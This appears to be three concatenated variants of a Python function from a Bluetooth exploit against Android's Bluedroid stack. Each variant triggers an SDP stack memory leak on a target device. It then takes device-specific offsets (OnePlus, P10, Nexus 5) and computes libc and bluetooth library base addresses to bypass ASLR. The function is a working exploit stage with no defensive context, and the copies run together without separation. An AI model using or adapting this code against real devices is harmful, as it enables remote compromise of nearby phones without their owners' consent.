def memory_leak_get_bases(src, src_hci, dst): prog = log.progress('Doing stack memory leak...') # Get leaked stack data. This memory leak gets "deterministic" "garbage" from the stack. result = bluedroid.do_sdp_info_leak(dst, src) print result # Calculate according to known libc.so and bluetooth.default.so binaries #OnePlus likely_some_libc_blx_offset = result[2][5] likely_some_bluetooth_default_global_var_offset = result[3][3] #P10 likely_some_libc_blx_offset = result[9][7] likely_some_bluetooth_default_global_var_offset = result[5][3] libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET bluetooth_default_bss_base = likely_some_bluetooth_default_global_var_offset - BLUETOOTH_BSS_SOME_VAR_OFFSET log.info('libc_base: 0x%08x, bss_base: 0x%08x' % (libc_text_base, bluetooth_default_bss_base)) # Close SDP ACL connection os.system('hcitool dc %s' % (dst,)) time.sleep(0.1) prog.success() return libc_text_base, bluetooth_default_bss_base
def memory_leak_get_bases(src, src_hci, dst): prog = log.progress('Doing stack memeory leak...') # Get leaked stack data. This memory leak gets "deterministic" "garbage" from the stack. result = bluedroid.do_sdp_info_leak(dst, src) #print("Leak: %s" % result) # Debug, show leak array print_result(result) # Calculate according to known libc.so and bluetooth.default.so binaries #likely_some_libc_blx_offset = result[-3][-2] #likely_some_bluetooth_default_global_var_offset = result[6][0] # Nexus 5 6.0.1 likely_some_libc_blx_offset = result[17][5] likely_some_bluetooth_default_global_var_offset = result[2][8] # Show leak address log.info("LIBC 0x%08x" % likely_some_libc_blx_offset) log.info("BT 0x%08x" % likely_some_bluetooth_default_global_var_offset) libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET bluetooth_default_bss_base = likely_some_bluetooth_default_global_var_offset - BLUETOOTH_BSS_SOME_VAR_OFFSET log.info('libc_base: 0x%08x, bss_base: 0x%08x' % (libc_text_base, bluetooth_default_bss_base)) # Close SDP ACL connection os.system('hcitool dc %s' % (dst, )) time.sleep(0.1) prog.success() return libc_text_base, bluetooth_default_bss_base
def memory_leak_get_bases(src, src_hci, dst): prog = log.progress('Doing stack memory leak...') # Get leaked stack data. This memory leak gets "deterministic" "garbage" from the stack. result = bluedroid.do_sdp_info_leak(dst, src) # Calculate according to known libc.so and bluetooth.default.so binaries likely_some_libc_blx_offset = result[-3][-2] likely_some_bluetooth_default_global_var_offset = result[6][0] libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET bluetooth_default_bss_base = likely_some_bluetooth_default_global_var_offset - BLUETOOTH_BSS_SOME_VAR_OFFSET log.info('libc_base: 0x%08x, bss_base: 0x%08x' % (libc_text_base, bluetooth_default_bss_base)) # Close SDP ACL connection os.system('hcitool dc %s' % (dst,)) time.sleep(0.1) prog.success() return libc_text_base, bluetooth_default_bss_base